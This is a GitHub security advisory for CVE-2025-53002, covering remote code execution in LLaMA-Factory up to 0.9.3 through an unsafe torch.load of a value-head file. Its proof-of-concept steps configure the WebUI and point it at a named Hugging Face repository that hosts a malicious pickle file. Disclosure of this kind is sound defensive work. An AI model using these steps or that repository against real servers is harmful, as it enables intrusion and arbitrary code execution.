ghsa-xj56-p8mm-qmxj
Vulnerability from github
Published
2025-06-27 15:27
Modified
2025-06-27 15:27
Summary
LLaMA-Factory allows Code Injection through improper vhead_file safeguards
Details

Summary

A critical remote code execution vulnerability was discovered during the Llama Factory training process. This vulnerability arises because the vhead_file is loaded without proper safeguards, allowing malicious attackers to execute arbitrary malicious code on the host system simply by passing a malicious Checkpoint path parameter through the WebUI interface. The attack is stealthy, as the victim remains unaware of the exploitation. The root cause is that the vhead_file argument is loaded without the secure parameter weights_only=True.

Note: In torch versions <2.6, the default setting is weights_only=False, and Llama Factory's setup.py only requires torch>=2.0.0.

Affected Version

Llama Factory versions <=0.9.3 are affected by this vulnerability.

Details

  1. In LLaMA Factory's WebUI, when a user sets the Checkpoint path, it modifies the adapter_name_or_path parameter passed to the training process. code in src/llamafactory/webui/runner.py image-1

  2. The adapter_name_or_path passed to the training process is then used in src/llamafactory/model/model_utils/valuehead.py to fetch the corresponding value_head.bin file from Hugging Face. This file is subsequently loaded via torch.load() without the security parameter weights_only=True being set, resulting in remote code execution. code in src/llamafactory/model/model_utils/valuehead.py image-2

PoC

Steps to Reproduce

  1. Deploy llama factory.
  2. Remote attack through the WebUI interface
    1. Configure Model name and Model path correctly. For demonstration purposes, we'll use a small model llamafactory/tiny-random-Llama-3 to accelerate model loading.
    2. Set Finetuning method to LoRA and Train Stage to Reward Modeling. The vulnerability is specifically triggered during the Reward Modeling training stage.
    3. Input a malicious Hugging Face path in Checkpoint path – here we use paulinsider/llamafactory-hack. This repository(https://huggingface.co/paulinsider/llamafactory-hack/tree/main ) contains a malicious value_head.bin file. The generation method for this file is as follows (it can execute arbitrary attack commands; for demonstration, we configured it to create a HACKED! folder).
    4. Click Start to begin training. After a brief wait, a HACKED! folder will be created on the server. Note that arbitrary malicious code could be executed through this method.

The video demonstration of the vulnerability exploitation is available at the Google Drive Link

Impact

Exploitation of this vulnerability allows remote attackers to: - Execute arbitrary malicious code / OS commands on the server. - Potentially compromise sensitive data or escalate privileges. - Deploy malware or create persistent backdoors in the system. This significantly increases the risk of data breaches and operational disruption.

Show details on source website


{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "llamafactory"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.9.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-53002"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-06-27T15:27:01Z",
    "nvd_published_at": "2025-06-26T15:15:23Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nA critical remote code execution vulnerability was discovered during the Llama Factory training process. This vulnerability arises because the `vhead_file` is loaded without proper safeguards, allowing malicious attackers to execute arbitrary malicious code on the host system simply by passing a malicious `Checkpoint path` parameter through the `WebUI` interface. The attack is stealthy, as the victim remains unaware of the exploitation. The root cause is that the `vhead_file` argument is loaded without the secure parameter `weights_only=True`.\n\nNote: In torch versions \u003c2.6, the default setting is `weights_only=False`, and Llama Factory\u0027s `setup.py` only requires `torch\u003e=2.0.0`.\n\n### Affected Version\n\nLlama Factory versions \u003c=0.9.3 are affected by this vulnerability.\n\n### Details\n\n1. In LLaMA Factory\u0027s WebUI, when a user sets the `Checkpoint path`, it modifies the `adapter_name_or_path` parameter passed to the training process.\ncode in src/llamafactory/webui/runner.py\n\u003cimg width=\"1040\" alt=\"image-1\" src=\"https://github.com/user-attachments/assets/c8bc79e4-ce7d-43c9-b0fd-e37c235e6585\" /\u003e\n\n2. The `adapter_name_or_path` passed to the training process is then used in `src/llamafactory/model/model_utils/valuehead.py` to fetch the corresponding `value_head.bin` file from Hugging Face. This file is subsequently loaded via `torch.load()` without the security parameter `weights_only=True` being set, resulting in remote code execution.\ncode in src/llamafactory/model/model_utils/valuehead.py\n\u003cimg width=\"1181\" alt=\"image-2\" src=\"https://github.com/user-attachments/assets/6edbe694-0c60-4a54-bfb3-5e1042c9230d\" /\u003e\n\n### PoC\n\n#### Steps to Reproduce\n\n1. Deploy llama factory.\n2. Remote attack through the WebUI interface\n    1. Configure `Model name` and `Model path`  correctly. For demonstration purposes, we\u0027ll use a small model `llamafactory/tiny-random-Llama-3` to accelerate model loading.\n    2. Set `Finetuning method` to `LoRA` and `Train Stage` to `Reward Modeling`. The vulnerability is specifically triggered during the Reward Modeling training stage.\n    3. Input a malicious Hugging Face path in `Checkpoint path` \u2013 here we use `paulinsider/llamafactory-hack`. This repository(https://huggingface.co/paulinsider/llamafactory-hack/tree/main ) contains a malicious `value_head.bin` file. The generation method for this file is as follows (it can execute arbitrary attack commands; for demonstration, we configured it to create a `HACKED!` folder).\n    4. Click `Start` to begin training. After a brief wait, a `HACKED!` folder will be created on the server. Note that arbitrary malicious code could be executed through this method.\n\n**The video demonstration of the vulnerability exploitation is available at the** [Google Drive Link](https://drive.google.com/file/d/1AddKm2mllsXfuvL4Tvbn_WJdjEOYXx4y/view?usp=sharing) \n\n### Impact\nExploitation of this vulnerability allows remote attackers to:\n - Execute arbitrary malicious code / OS commands on the server.\n - Potentially compromise sensitive data or escalate privileges.\n - Deploy malware or create persistent backdoors in the system.\nThis significantly increases the risk of data breaches and operational disruption.",
  "id": "GHSA-xj56-p8mm-qmxj",
  "modified": "2025-06-27T15:27:02Z",
  "published": "2025-06-27T15:27:01Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/hiyouga/LLaMA-Factory/security/advisories/GHSA-xj56-p8mm-qmxj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53002"
    },
    {
      "type": "WEB",
      "url": "https://github.com/hiyouga/LLaMA-Factory/commit/bb7bf51554d4ba8432333c35a5e3b52705955ede"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/hiyouga/LLaMA-Factory"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "LLaMA-Factory allows Code Injection through improper vhead_file safeguards"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading...

Loading...

Loading...
  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.